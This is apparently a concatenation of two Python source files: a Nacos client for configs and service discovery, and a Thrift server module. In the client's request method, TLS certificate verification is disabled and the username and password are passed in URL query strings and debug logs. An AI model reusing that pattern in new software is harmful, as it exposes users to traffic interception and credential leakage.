if self.namespace:
params["tenant"] = self.namespace
if app_name:
params["appName"] = app_name
if config_type:
params["type"] = config_type
try:
resp = self._do_sync_req("/nacos/v1/cs/configs", None, None, params,
timeout or self.default_timeout, "POST")
c = resp.read()
logger.info("[publish] publish content, group:%s, data_id:%s, server response:%s" % (
group, data_id, c))
return c == b"true"
except HTTPError as e:
if e.code == HTTPStatus.FORBIDDEN:
raise NacosException("Insufficient privilege.")
else:
raise NacosException("Request Error, code is %s" % e.code)
except Exception as e:
logger.exception("[publish] exception %s occur" % str(e))
raise
def get_config(self, data_id, group, timeout=None, no_snapshot=None):
no_snapshot = self.no_snapshot if no_snapshot is None else no_snapshot
data_id, group = process_common_config_params(data_id, group)
logger.info("[get-config] data_id:%s, group:%s, namespace:%s, timeout:%s" % (
data_id, group, self.namespace, timeout))
params = {
"dataId": data_id,
"group": group,
}
if self.namespace:
params["tenant"] = self.namespace
cache_key = group_key(data_id, group, self.namespace)
# get from failover
content = read_file_str(self.failover_base, cache_key)
if content is None:
logger.debug("[get-config] failover config is not exist for %s, try to get from server" % cache_key)
else:
logger.debug("[get-config] get %s from failover directory, content is %s" % (cache_key, truncate(content)))
return content
# get from server
try:
resp = self._do_sync_req("/nacos/v1/cs/configs", None, params, None, timeout or self.default_timeout)
content = resp.read().decode("UTF-8")
except HTTPError as e:
if e.code == HTTPStatus.NOT_FOUND:
logger.debug(
"[get-config] config not found for data_id:%s, group:%s, namespace:%s, try to delete snapshot" % (
data_id, group, self.namespace))
delete_file(self.snapshot_base, cache_key)
return None
elif e.code == HTTPStatus.CONFLICT:
logger.error(
"[get-config] config being modified concurrently for data_id:%s, group:%s, namespace:%s" % (
data_id, group, self.namespace))
elif e.code == HTTPStatus.FORBIDDEN:
logger.error("[get-config] no right for data_id:%s, group:%s, namespace:%s" % (
data_id, group, self.namespace))
raise NacosException("Insufficient privilege.")
else:
logger.error("[get-config] error code [:%s] for data_id:%s, group:%s, namespace:%s" % (
e.code, data_id, group, self.namespace))
if no_snapshot:
raise
except Exception as e:
logger.exception("[get-config] exception %s occur" % str(e))
if no_snapshot:
raise
if no_snapshot:
return content
if content is not None:
logger.info(
"[get-config] content from server:%s, data_id:%s, group:%s, namespace:%s, try to save snapshot" % (
truncate(content), data_id, group, self.namespace))
try:
save_file(self.snapshot_base, cache_key, content)
except Exception as e:
logger.exception("[get-config] save snapshot failed for %s, data_id:%s, group:%s, namespace:%s" % (
data_id, group, self.namespace, str(e)))
return content
logger.error("[get-config] get config from server failed, try snapshot, data_id:%s, group:%s, namespace:%s" % (
data_id, group, self.namespace))
content = read_file_str(self.snapshot_base, cache_key)
if content is None:
logger.debug("[get-config] snapshot is not exist for %s." % cache_key)
else:
logger.debug("[get-config] get %s from snapshot directory, content is %s" % (cache_key, truncate(content)))
return content
def get_configs(self, timeout=None, no_snapshot=None, group="", page_no=1, page_size=1000):
no_snapshot = self.no_snapshot if no_snapshot is None else no_snapshot
logger.info("[get-configs] namespace:%s, timeout:%s, group:%s, page_no:%s, page_size:%s" % (
self.namespace, timeout, group, page_no, page_size))
params = {
"dataId": "",
"group": group,
"search": "accurate",
"pageNo": page_no,
"pageSize": page_size,
}
if self.namespace:
params["tenant"] = self.namespace
cache_key = group_key("", "", self.namespace)
# get from failover
content = read_file_str(self.failover_base, cache_key)
if content is None:
logger.debug("[get-config] failover config is not exist for %s, try to get from server" % cache_key)
else:
logger.debug("[get-config] get %s from failover directory, content is %s" % (cache_key, truncate(content)))
return json.loads(content)
# get from server
try:
resp = self._do_sync_req("/nacos/v1/cs/configs", None, params, None, timeout or self.default_timeout)
content = resp.read().decode("UTF-8")
except HTTPError as e:
if e.code == HTTPStatus.CONFLICT:
logger.error(
"[get-configs] configs being modified concurrently for namespace:%s" % self.namespace)
elif e.code == HTTPStatus.FORBIDDEN:
logger.error("[get-configs] no right for namespace:%s" % self.namespace)
raise NacosException("Insufficient privilege.")
else:
logger.error("[get-configs] error code [:%s] for namespace:%s" % (e.code, self.namespace))
if no_snapshot:
raise
except Exception as e:
logger.exception("[get-config] exception %s occur" % str(e))
if no_snapshot:
raise
if no_snapshot:
return json.loads(content)
if content is not None:
logger.info(
"[get-configs] content from server:%s, namespace:%s, try to save snapshot" % (
truncate(content), self.namespace))
try:
save_file(self.snapshot_base, cache_key, content)
for item in json.loads(content).get("pageItems"):
data_id = item.get('dataId')
group = item.get('group')
item_content = item.get('content')
item_cache_key = group_key(data_id, group, self.namespace)
save_file(self.snapshot_base, item_cache_key, item_content)
except Exception as e:
logger.exception("[get-configs] save snapshot failed for %s, namespace:%s" % (
str(e), self.namespace))
return json.loads(content)
logger.error("[get-configs] get config from server failed, try snapshot, namespace:%s" % self.namespace)
content = read_file_str(self.snapshot_base, cache_key)
if content is None:
logger.debug("[get-configs] snapshot is not exist for %s." % cache_key)
else:
logger.debug("[get-configs] get %s from snapshot directory, content is %s" % (cache_key, truncate(content)))
return json.loads(content)
@synchronized_with_attr("pulling_lock")
def add_config_watcher(self, data_id, group, cb, content=None):
cache_key = group_key(data_id, group, self.namespace)
if not self.watcher_mapping.get(cache_key):
self.add_config_watchers(data_id, group, [cb], content)
@synchronized_with_attr("pulling_lock")
def add_config_watchers(self, data_id, group, cb_list, content=None):
if not cb_list:
raise NacosException("A callback function is needed.")
data_id, group = process_common_config_params(data_id, group)
logger.info("[add-watcher] data_id:%s, group:%s, namespace:%s" % (data_id, group, self.namespace))
cache_key = group_key(data_id, group, self.namespace)
wl = self.watcher_mapping.get(cache_key)
if not wl:
wl = list()
self.watcher_mapping[cache_key] = wl
if not content:
content = self.get_config(data_id, group)
last_md5 = NacosClient.get_md5(content)
for cb in cb_list:
wl.append(WatcherWrap(cache_key, cb, last_md5))
logger.info("[add-watcher] watcher has been added for key:%s, new callback is:%s, callback number is:%s" % (
cache_key, cb.__name__, len(wl)))
if self.puller_mapping is None:
logger.debug("[add-watcher] pulling should be initialized")
self._init_pulling()
if cache_key in self.puller_mapping:
logger.debug("[add-watcher] key:%s is already in pulling" % cache_key)
return
for key, puller_info in self.puller_mapping.items():
if len(puller_info[1]) < self.pulling_config_size:
logger.debug("[add-watcher] puller:%s is available, add key:%s" % (puller_info[0], cache_key))
puller_info[1].append(cache_key)
self.puller_mapping[cache_key] = puller_info
break
else:
logger.debug("[add-watcher] no puller available, new one and add key:%s" % cache_key)
key_list = self.process_mgr.list()
key_list.append(cache_key)
sys_os = platform.system()
if sys_os == 'Windows':
puller = Thread(target=self._do_pulling, args=(key_list, self.notify_queue))
puller.setDaemon(True)
else:
puller = Process(target=self._do_pulling, args=(key_list, self.notify_queue))
puller.daemon = True
puller.start()
self.puller_mapping[cache_key] = (puller, key_list)
@synchronized_with_attr("pulling_lock")
def remove_config_watcher(self, data_id, group, cb, remove_all=False):
if not cb:
raise NacosException("A callback function is needed.")
data_id, group = process_common_config_params(data_id, group)
if not self.puller_mapping:
logger.debug("[remove-watcher] watcher is never started.")
return
cache_key = group_key(data_id, group, self.namespace)
wl = self.watcher_mapping.get(cache_key)
if not wl:
logger.debug("[remove-watcher] there is no watcher on key:%s" % cache_key)
return
wrap_to_remove = list()
for i in wl:
if i.callback == cb:
wrap_to_remove.append(i)
if not remove_all:
break
for i in wrap_to_remove:
wl.remove(i)
logger.info("[remove-watcher] %s is removed from %s, remove all:%s" % (cb.__name__, cache_key, remove_all))
if not wl:
logger.debug("[remove-watcher] there is no watcher for:%s, kick out from pulling" % cache_key)
self.watcher_mapping.pop(cache_key)
puller_info = self.puller_mapping[cache_key]
puller_info[1].remove(cache_key)
if not puller_info[1]:
logger.debug("[remove-watcher] there is no pulling keys for puller:%s, stop it" % puller_info[0])
self.puller_mapping.pop(cache_key)
if isinstance(puller_info[0], Process):
puller_info[0].terminate()
def _do_sync_req(self, url, headers=None, params=None, data=None, timeout=None, method="GET"):
if self.username and self.password:
if not params:
params = {}
params.update({"username": self.username, "password": self.password})
url = "?".join([url, urlencode(params)]) if params else url
all_headers = self._get_common_headers(params, data)
if headers:
all_headers.update(headers)
logger.debug(
"[do-sync-req] url:%s, headers:%s, params:%s, data:%s, timeout:%s" % (
url, all_headers, params, data, timeout))
tries = 0
while True:
try:
server_info = self.get_server()
if not server_info:
logger.error("[do-sync-req] can not get one server.")
raise NacosRequestException("Server is not available.")
address, port = server_info
server = ":".join([address, str(port)])
server_url = server
if not server_url.startswith("http"):
server_url = "%s://%s" % ("http", server)
if python_version_bellow("3"):
req = Request(url=server_url + url, data=urlencode(data).encode() if data else None,
headers=all_headers)
req.get_method = lambda: method
ctx = ssl.create_default_context()
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
else:
req = Request(url=server_url + url, data=urlencode(data).encode() if data else None,
headers=all_headers, method=method)
ctx = ssl.SSLContext()
# build a new opener that adds proxy setting so that http request go through the proxy
if self.proxies:
proxy_support = ProxyHandler(self.proxies)
opener = HTTPHandler()
if 'https://' in server_url:
opener = build_opener(proxy_support, HTTPSHandler(context=ctx))
resp = opener.open(req, timeout=timeout)
else:
if 'https://' in server_url:
resp = urlopen(req, timeout=timeout, context=ctx)
else:
resp = urlopen(req, timeout=timeout)
logger.debug("[do-sync-req] info from server:%s" % server)
return resp
except HTTPError as e:
if e.code in [HTTPStatus.INTERNAL_SERVER_ERROR, HTTPStatus.BAD_GATEWAY,
HTTPStatus.SERVICE_UNAVAILABLE]:
logger.debug("[do-sync-req] server:%s is not available for reason:%s" % (server, e.msg))
else:
raise
except socket.timeout:
logger.debug("[do-sync-req] %s request timeout" % server)
except URLError as e:
logger.debug("[do-sync-req] %s connection error:%s" % (server, e.reason))
tries += 1
if tries >= len(self.server_list):
logger.error("[do-sync-req] %s maybe down, no server is currently available" % server)
raise NacosRequestException("All server are not available")
self.change_server()
logger.debug("[do-sync-req] %s maybe down, skip to next" % server)
def _do_pulling(self, cache_list, queue):
cache_pool = dict()
for cache_key in cache_list:
cache_pool[cache_key] = CacheData(cache_key, self)
while cache_list:
unused_keys = set(cache_pool.keys())
contains_init_key = False
probe_update_string = ""
for cache_key in cache_list:
cache_data = cache_pool.get(cache_key)
if not cache_data:
logger.debug("[do-pulling] new key added: %s" % cache_key)
cache_data = CacheData(cache_key, self)
cache_pool[cache_key] = cache_data
else:
unused_keys.remove(cache_key)
if cache_data.is_init:
contains_init_key = True
data_id, group, namespace = parse_key(cache_key)
probe_update_string += WORD_SEPARATOR.join(
[data_id, group, cache_data.md5 or "", self.namespace]) + LINE_SEPARATOR
for k in unused_keys:
logger.debug("[do-pulling] %s is no longer watched, remove from cache" % k)
cache_pool.pop(k)
logger.debug(
"[do-pulling] try to detected change from server probe string is %s" % truncate(probe_update_string))
headers = {"Long-Pulling-Timeout": int(self.pulling_timeout * 1000)}
# if contains_init_key:
# headers["longPullingNoHangUp"] = "true"
data = {"Listening-Configs": probe_update_string}
changed_keys = list()
try:
resp = self._do_sync_req("/nacos/v1/cs/configs/listener", headers, None, data,
self.pulling_timeout + 10, "POST")
changed_keys = [group_key(*i) for i in parse_pulling_result(resp.read())]
logger.debug("[do-pulling] following keys are changed from server %s" % truncate(str(changed_keys)))
except NacosException as e:
logger.error("[do-pulling] nacos exception: %s, waiting for recovery" % str(e))
time.sleep(1)
except Exception as e:
logger.exception("[do-pulling] exception %s occur, return empty list, waiting for recovery" % str(e))
time.sleep(1)
for cache_key, cache_data in cache_pool.items():
cache_data.is_init = False
if cache_key in changed_keys:
data_id, group, namespace = parse_key(cache_key)
content = self.get_config(data_id, group)
cache_data.md5 = NacosClient.get_md5(content)
cache_data.content = content
queue.put((cache_key, cache_data.content, cache_data.md5))
@synchronized_with_attr("pulling_lock")
def _init_pulling(self):
if self.puller_mapping is not None:
logger.info("[init-pulling] puller is already initialized")
return
self.puller_mapping = dict()
self.notify_queue = Queue()
self.callback_tread_pool = pool.ThreadPool(self.callback_thread_num)
self.process_mgr = Manager()
t = Thread(target=self._process_polling_result)
t.setDaemon(True)
t.start()
logger.info("[init-pulling] init completed")
def _process_polling_result(self):
while True:
cache_key, content, md5 = self.notify_queue.get()
logger.debug("[process-polling-result] receive an event:%s" % cache_key)
wl = self.watcher_mapping.get(cache_key)
if not wl:
logger.debug("[process-polling-result] no watcher on %s, ignored" % cache_key)
continue
data_id, group, namespace = parse_key(cache_key)
plain_content = content
params = {
"data_id": data_id,
"group": group,
"namespace": namespace,
"raw_content": content,
"content": plain_content,
}
for watcher in wl:
if not watcher.last_md5 == md5:
logger.debug(
"[process-polling-result] md5 changed since last call, calling %s with changed params: %s"
% (watcher.callback.__name__, params))
try:
self.callback_tread_pool.apply(watcher.callback, (params,))
except Exception as e:
logger.exception("[process-polling-result] exception %s occur while calling %s " % (
str(e), watcher.callback.__name__))
watcher.last_md5 = md5
def _get_common_headers(self, params, data):
headers = {}
if self.auth_enabled:
ts = str(int(time.time() * 1000))
ak, sk = self.ak, self.sk
headers.update({
"Spas-AccessKey": ak,
"timeStamp": ts,
})
sign_str = ""
# in case tenant or group is null
if not params and not data:
return headers
tenant = (params and params.get("tenant")) or (data and data.get("tenant"))
group = (params and params.get("group")) or (data and data.get("group"))
if tenant:
sign_str = tenant + "+"
if group:
sign_str = sign_str + group + "+"
if sign_str:
sign_str += ts
headers["Spas-Signature"] = base64.encodebytes(
hmac.new(sk.encode(), sign_str.encode(), digestmod=hashlib.sha1).digest()).decode().strip()
return headers
def _build_metadata(self, metadata, params):
if metadata:
if isinstance(metadata, dict):
params["metadata"] = json.dumps(metadata)
else:
params["metadata"] = metadata
def add_naming_instance(self, service_name, ip, port, cluster_name=None, weight=1.0, metadata=None,
enable=True, healthy=True, ephemeral=True, group_name=DEFAULT_GROUP_NAME):
logger.info("[add-naming-instance] ip:%s, port:%s, service_name:%s, namespace:%s" % (
ip, port, service_name, self.namespace))
params = {
"ip": ip,
"port": port,
"serviceName": service_name,
"weight": weight,
"enable": enable,
"healthy": healthy,
"clusterName": cluster_name,
"ephemeral": ephemeral,
"groupName": group_name
}
self._build_metadata(metadata, params)
if self.namespace:
params["namespaceId"] = self.namespace
try:
resp = self._do_sync_req("/nacos/v1/ns/instance", None, None, params, self.default_timeout, "POST")
c = resp.read()
logger.info("[add-naming-instance] ip:%s, port:%s, service_name:%s, namespace:%s, server response:%s" % (
ip, port, service_name, self.namespace, c))
return c == b"ok"
except HTTPError as e:
if e.code == HTTPStatus.FORBIDDEN:
raise NacosException("Insufficient privilege.")
else:
raise NacosException("Request Error, code is %s" % e.code)
except Exception as e:
logger.exception("[add-naming-instance] exception %s occur" % str(e))
raise
def remove_naming_instance(self, service_name, ip, port, cluster_name=None, ephemeral=True, group_name=DEFAULT_GROUP_NAME):
logger.info("[remove-naming-instance] ip:%s, port:%s, service_name:%s, namespace:%s" % (
ip, port, service_name, self.namespace))
params = {
"ip": ip,
"port": port,
"serviceName": service_name,
"ephemeral": ephemeral,
"groupName":group_name
}
if cluster_name is not None:
params["clusterName"] = cluster_name
if self.namespace:
params["namespaceId"] = self.namespace
try:
resp = self._do_sync_req("/nacos/v1/ns/instance", None, None, params, self.default_timeout, "DELETE")
c = resp.read()
logger.info("[remove-naming-instance] ip:%s, port:%s, service_name:%s, namespace:%s, server response:%s" % (
ip, port, service_name, self.namespace, c))
return c == b"ok"
except HTTPError as e:
if e.code == HTTPStatus.FORBIDDEN:
raise NacosException("Insufficient privilege.")
else:
raise NacosException("Request Error, code is %s" % e.code)
except Exception as e:
logger.exception("[remove-naming-instance] exception %s occur" % str(e))
raise
def modify_naming_instance(self, service_name, ip, port, cluster_name=None, weight=None, metadata=None,
enable=None, ephemeral=True, group_name=DEFAULT_GROUP_NAME):
logger.info("[modify-naming-instance] ip:%s, port:%s, service_name:%s, namespace:%s" % (
ip, port, service_name, self.namespace))
params = {
"ip": ip,
"port": port,
"serviceName": service_name,
"ephemeral": ephemeral,
"groupName": group_name
}
if cluster_name is not None:
params["clusterName"] = cluster_name
if enable is not None:
params["enable"] = enable
if weight is not None:
params["weight"] = weight
self._build_metadata(metadata, params)
if self.namespace:
params["namespaceId"] = self.namespace
try:
resp = self._do_sync_req("/nacos/v1/ns/instance", None, None, params, self.default_timeout, "PUT")
c = resp.read()
logger.info("[modify-naming-instance] ip:%s, port:%s, service_name:%s, namespace:%s, server response:%s" % (
ip, port, service_name, self.namespace, c))
return c == b"ok"
except HTTPError as e:
if e.code == HTTPStatus.FORBIDDEN:
raise NacosException("Insufficient privilege.")
else:
raise NacosException("Request Error, code is %s" % e.code)
except Exception as e:
logger.exception("[modify-naming-instance] exception %s occur" % str(e))
raise
def list_naming_instance(self, service_name, clusters=None, namespace_id=None, group_name=None, healthy_only=False):
"""
:param service_name: 服务名
:param clusters: 集群名称 字符串,多个集群用逗号分隔
:param namespace_id: 命名空间ID
:param group_name: 分组名
:param healthy_only: 是否只返回健康实例 否,默认为false
"""
logger.info("[list-naming-instance] service_name:%s, namespace:%s" % (service_name, self.namespace))
params = {
"serviceName": service_name,
"healthyOnly": healthy_only
}
if clusters is not None:
params["clusters"] = clusters
namespace_id = namespace_id or self.namespace
if namespace_id:
params["namespaceId"] = namespace_id
group_name = group_name or 'DEFAULT_GROUP'
if group_name:
params['groupName'] = group_name
try:
resp = self._do_sync_req("/nacos/v1/ns/instance/list", None, params, None, self.default_timeout, "GET")
c = resp.read()
logger.info("[list-naming-instance] service_name:%s, namespace:%s, server response:%s" %
(service_name, self.namespace, c))
return json.loads(c.decode("UTF-8"))
except HTTPError as e:
if e.code == HTTPStatus.FORBIDDEN:
raise NacosException("Insufficient privilege.")
else:
raise NacosException("Request Error, code is %s" % e.code)
except Exception as e:
logger.exception("[list-naming-instance] exception %s occur" % str(e))
raise
def get_naming_instance(self, service_name, ip, port, cluster_name=None):
logger.info("[get-naming-instance] ip:%s, port:%s, service_name:%s, namespace:%s" % (ip, port, service_name,
self.namespace))
params = {
"serviceName": service_name,
"ip": ip,
"port": port,
}
if cluster_name is not None:
params["cluster"] = cluster_name
params["clusterName"] = cluster_name
if self.namespace:
params["namespaceId"] = self.namespace
try:
resp = self._do_sync_req("/nacos/v1/ns/instance", None, params, None, self.default_timeout, "GET")
c = resp.read()
logger.info("[get-naming-instance] ip:%s, port:%s, service_name:%s, namespace:%s, server response:%s" %
(ip, port, service_name, self.namespace, c))
return json.loads(c.decode("UTF-8"))
except HTTPError as e:
if e.code == HTTPStatus.FORBIDDEN:
raise NacosException("Insufficient privilege.")
else:
raise NacosException("Request Error, code is %s" % e.code)
except Exception as e:
logger.exception("[get-naming-instance] exception %s occur" % str(e))
raise
def send_heartbeat(self, service_name, ip, port, cluster_name=None, weight=1.0, metadata=None, ephemeral=True, group_name=DEFAULT_GROUP_NAME):
logger.info("[send-heartbeat] ip:%s, port:%s, service_name:%s, namespace:%s" % (ip, port, service_name,
self.namespace))
beat_data = {
"serviceName": service_name,
"ip": ip,
"port": port,
"weight": weight,
"ephemeral": ephemeral
}
if cluster_name is not None:
beat_data["cluster"] = cluster_name
if metadata is not None:
if isinstance(metadata, str):
beat_data["metadata"] = json.loads(metadata)
else:
beat_data["metadata"] = metadata
params = {
"serviceName": service_name,
"beat": json.dumps(beat_data),
"groupName": group_name
}
if self.namespace:
params["namespaceId"] = self.namespace
try:
resp = self._do_sync_req("/nacos/v1/ns/instance/beat", None, params, None, self.default_timeout, "PUT")
c = resp.read()
logger.info("[send-heartbeat] ip:%s, port:%s, service_name:%s, namespace:%s, server response:%s" %
(ip, port, service_name, self.namespace, c))
return json.loads(c.decode("UTF-8"))
except HTTPError as e:
if e.code == HTTPStatus.FORBIDDEN:
raise NacosException("Insufficient privilege.")
else:
raise NacosException("Request Error, code is %s" % e.code)
except Exception as e:
logger.exception("[send-heartbeat] exception %s occur" % str(e))
raise
def subscribe(self,
listener_fn, listener_interval=7, *args, **kwargs):
"""
reference at `/nacos/v1/ns/instance/list` in https://nacos.io/zh-cn/docs/open-api.html
:param listener_fn 监听方法,可以是元组,列表,单个监听方法
:param listener_interval 监听间隔,在 HTTP 请求 OpenAPI 时间间隔
:return:
"""
service_name = kwargs.get("service_name")
if not service_name:
if len(args) > 0:
service_name = args[0]
else:
raise NacosException("`service_name` is required in subscribe")
self.subscribed_local_manager.add_local_listener(key=service_name, listener_fn=listener_fn)
# 判断是否是第一次订阅调用
class _InnerSubContext(object):
first_sub = True
def _compare_and_trigger_listener():
# invoke `list_naming_instance`
latest_res = self.list_naming_instance(*args, **kwargs)
latest_instances = latest_res['hosts']
# 获取本地缓存实例
local_service_instances_dict = self.subscribed_local_manager.get_local_instances(service_name)
# 当前本地没有缓存,所有都是新的实例
if not local_service_instances_dict:
if not latest_instances or len(latest_instances) < 1:
# 第一次订阅调用不通知
if _InnerSubContext.first_sub:
_InnerSubContext.first_sub = False
return
for instance in latest_instances:
slc = SubscribedLocalInstance(key=service_name, instance=instance)
self.subscribed_local_manager.add_local_instance(slc)
# 第一次订阅调用不通知
if _InnerSubContext.first_sub:
_InnerSubContext.first_sub = False
return
self.subscribed_local_manager.do_listener_launch(service_name, Event.ADDED, slc)
else:
local_service_instances_dict_copy = local_service_instances_dict.copy()
for instance in latest_instances:
slc = SubscribedLocalInstance(key=service_name, instance=instance)
local_slc = local_service_instances_dict.get(slc.instance_id)
# 本地不存在实例缓存
if local_slc is None:
self.subscribed_local_manager.add_local_instance(slc)
self.subscribed_local_manager.do_listener_launch(service_name, Event.ADDED, slc)
# 本地存在实例缓存
else:
local_slc_md5 = local_slc.md5
local_slc_id = local_slc.instance_id
local_service_instances_dict_copy.pop(local_slc_id)
# 比较md5,存在实例变更
if local_slc_md5 != slc.md5:
self.subscribed_local_manager.remove_local_instance(local_slc).add_local_instance(slc)
self.subscribed_local_manager.do_listener_launch(service_name, Event.MODIFIED, slc)
# still have instances in local marked deleted
if len(local_service_instances_dict_copy) > 0:
for local_slc_id, slc in local_service_instances_dict_copy.items():
self.subscribed_local_manager.remove_local_instance(slc)
self.subscribed_local_manager.do_listener_launch(service_name, Event.DELETED, slc)
timer_name = 'service-subscribe-timer-{key}'.format(key=service_name)
subscribe_timer = NacosTimer(name=timer_name,
interval=listener_interval,
fn=_compare_and_trigger_listener)
subscribe_timer.scheduler()
self.subscribe_timer_manager.add_timer(subscribe_timer)
def unsubscribe(self, service_name, listener_name=None):
"""
remove listener from subscribed listener manager
:param service_name: service_name
:param listener_name: listener name
:return:
"""
listener_manager = self.subscribed_local_manager.get_local_listener_manager(key=service_name)
if not listener_manager:
return
if listener_name:
listener_manager.remove_listener(listener_name)
return
listener_manager.empty_listeners()
def stop_subscribe(self):
"""
stop subscribe timer scheduler
:return:
"""
self.subscribe_timer_manager.stop()
if DEBUG:
NacosClient.set_debugging()
|
TServer.py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import sys
import os
import threading
if sys.version_info[0] >= 3:
import queue
Queue = queue
else:
import Queue
import warnings
from nebula2.fbthrift.Thrift import TProcessor, TApplicationException
from nebula2.fbthrift.transport import TTransport
from nebula2.fbthrift.protocol import TBinaryProtocol
from nebula2.fbthrift.protocol.THeaderProtocol import THeaderProtocolFactory
class TConnectionContext:
def getPeerName(self):
"""Gets the address of the client.
Returns:
The equivalent value of socket.getpeername() on the client socket
"""
raise NotImplementedError
class TRpcConnectionContext(TConnectionContext):
"""Connection context class for thrift RPC calls"""
def __init__(self, client_socket, iprot=None, oprot=None):
"""Initializer.
Arguments:
client_socket: the TSocket to the client
"""
self._client_socket = client_socket
self.iprot = iprot
self.oprot = oprot
def setProtocols(self, iprot, oprot):
self.iprot = iprot
self.oprot = oprot
def getPeerName(self):
"""Gets the address of the client.
Returns:
Same value as socket.peername() for the TSocket
"""
return self._client_socket.getPeerName()
def getSockName(self):
"""Gets the address of the server.
Returns:
Same value as socket.getsockname() for the TSocket
"""
return self._client_socket.getsockname()
class TServerEventHandler:
"""Event handler base class.
Override selected methods on this class to implement custom event handling
"""
def preServe(self, address):
"""Called before the server begins.
Arguments:
address: the address that the server is listening on
"""
pass
def newConnection(self, context):
"""Called when a client has connected and is about to begin processing.
Arguments:
context: instance of TRpcConnectionContext
"""
pass
def clientBegin(self, iprot, oprot):
"""Deprecated: Called when a new connection is made to the server.
For all servers other than TNonblockingServer, this function is called
whenever newConnection is called and vice versa. This is the old-style
for event handling and is not supported for TNonblockingServer. New
code should always use the newConnection method.
"""
pass
def connectionDestroyed(self, context):
"""Called when a client has finished request-handling.
Arguments:
context: instance of TRpcConnectionContext
"""
pass
class TServer:
"""Base interface for a server, which must have a serve method."""
""" constructors for all servers:
1) (processor, serverTransport)
2) (processor, serverTransport, transportFactory, protocolFactory)
3) (processor, serverTransport,
inputTransportFactory, outputTransportFactory,
inputProtocolFactory, outputProtocolFactory)
Optionally, the handler can be passed instead of the processor,
and a processor will be created automatically:
4) (handler, serverTransport)
5) (handler, serverTransport, transportFacotry, protocolFactory)
6) (handler, serverTransport,
inputTransportFactory, outputTransportFactory,
inputProtocolFactory, outputProtocolFactory)
The attribute serverEventHandler (default: None) receives
callbacks for various events in the server lifecycle. It should
be set to an instance of TServerEventHandler.
"""
def __init__(self, *args):
if (len(args) == 2):
self.__initArgs__(args[0], args[1],
TTransport.TTransportFactoryBase(),
TTransport.TTransportFactoryBase(),
TBinaryProtocol.TBinaryProtocolFactory(),
TBinaryProtocol.TBinaryProtocolFactory())
elif (len(args) == 4):
self.__initArgs__(args[0], args[1], args[2], args[2], args[3],
args[3])
elif (len(args) == 6):
self.__initArgs__(args[0], args[1], args[2], args[3], args[4],
args[5])
def __initArgs__(self, processor, serverTransport,
inputTransportFactory, outputTransportFactory,
inputProtocolFactory, outputProtocolFactory):
self.processor = self._getProcessor(processor)
self.serverTransport = serverTransport
self.inputTransportFactory = inputTransportFactory
self.outputTransportFactory = outputTransportFactory
self.inputProtocolFactory = inputProtocolFactory
self.outputProtocolFactory = outputProtocolFactory
self.serverEventHandler = TServerEventHandler()
def _getProcessor(self, processor):
""" Check if a processor is really a processor, or if it is a handler
auto create a processor for it """
if isinstance(processor, TProcessor):
return processor
elif hasattr(processor, "_processor_type"):
handler = processor
return handler._processor_type(handler)
else:
raise TApplicationException(
message="Could not detect processor type")
def setServerEventHandler(self, handler):
self.serverEventHandler = handler
def _clientBegin(self, context, iprot, oprot):
self.serverEventHandler.newConnection(context)
self.serverEventHandler.clientBegin(iprot, oprot)
def handle(self, client):
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
if isinstance(self.inputProtocolFactory, THeaderProtocolFactory):
oprot = iprot
else:
oprot = self.outputProtocolFactory.getProtocol(otrans)
context = TRpcConnectionContext(client, iprot, oprot)
self._clientBegin(context, iprot, oprot)
try:
while True:
self.processor.process(iprot, oprot, context)
except TTransport.TTransportException:
pass
except Exception as x:
logging.exception(x)
self.serverEventHandler.connectionDestroyed(context)
itrans.close()
otrans.close()
def serve(self):
pass
class TSimpleServer(TServer):
"""Simple single-threaded server that just pumps around one transport."""
def __init__(self, *args):
warnings.warn("TSimpleServer is deprecated. Please use one of "
"Nonblocking, Twisted, or Gevent server instead.",
DeprecationWarning)
TServer.__init__(self, *args)
def serve(self):
self.serverTransport.listen()
for name in self.serverTransport.getSocketNames():
self.serverEventHandler.preServe(name)
while True:
client = self.serverTransport.accept()
self.handle(client)
class TThreadedServer(TServer):
"""Threaded server that spawns a new thread per each connection."""
def __init__(self, *args, **kwargs):
TServer.__init__(self, *args)
self.daemon = kwargs.get("daemon", False)
def serve(self):
self.serverTransport.listen()
for name in self.serverTransport.getSocketNames():
self.serverEventHandler.preServe(name)
while True:
try:
client = self.serverTransport.accept()
t = threading.Thread(target=self.handle, args=(client,))
t.daemon = self.daemon
t.start()
except KeyboardInterrupt:
raise
except Exception as x:
logging.exception(x)
class TForkingServer(TServer):
"""A Thrift server that forks a new process for each request"""
"""
This is more scalable than the threaded server as it does not cause
GIL contention.
Note that this has different semantics from the threading server.
Specifically, updates to shared variables will no longer be shared.
It will also not work on windows.
This code is heavily inspired by SocketServer.ForkingMixIn in the
Python stdlib.
"""
def __init__(self, *args):
TServer.__init__(self, *args)
self.children = []
def serve(self):
def tryClose(file):
try:
file.close()
except IOError as e:
logging.warning(e, exc_info=True)
self.serverTransport.listen()
for name in self.serverTransport.getSocketNames():
self.serverEventHandler.preServe(name)
while True:
client = self.serverTransport.accept()
try:
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
if isinstance(self.inputProtocolFactory,
THeaderProtocolFactory):
oprot = iprot
else:
oprot = self.outputProtocolFactory.getProtocol(otrans)
context = TRpcConnectionContext(client, iprot, oprot)
self._clientBegin(context, iprot, oprot)
pid = os.fork()
if pid: # parent
# add before collect, otherwise you race w/ waitpid
self.children.append(pid)
self._collectChildren()
# Parent must close socket or the connection may not get
# closed promptly
tryClose(itrans)
tryClose(otrans)
else:
ecode = 0
try:
try:
while True:
self.processor.process(iprot, oprot, context)
except TTransport.TTransportException:
pass
except Exception as e:
logging.exception(e)
ecode = 1
finally:
self.serverEventHandler.connectionDestroyed(context)
tryClose(itrans)
tryClose(otrans)
os._exit(ecode)
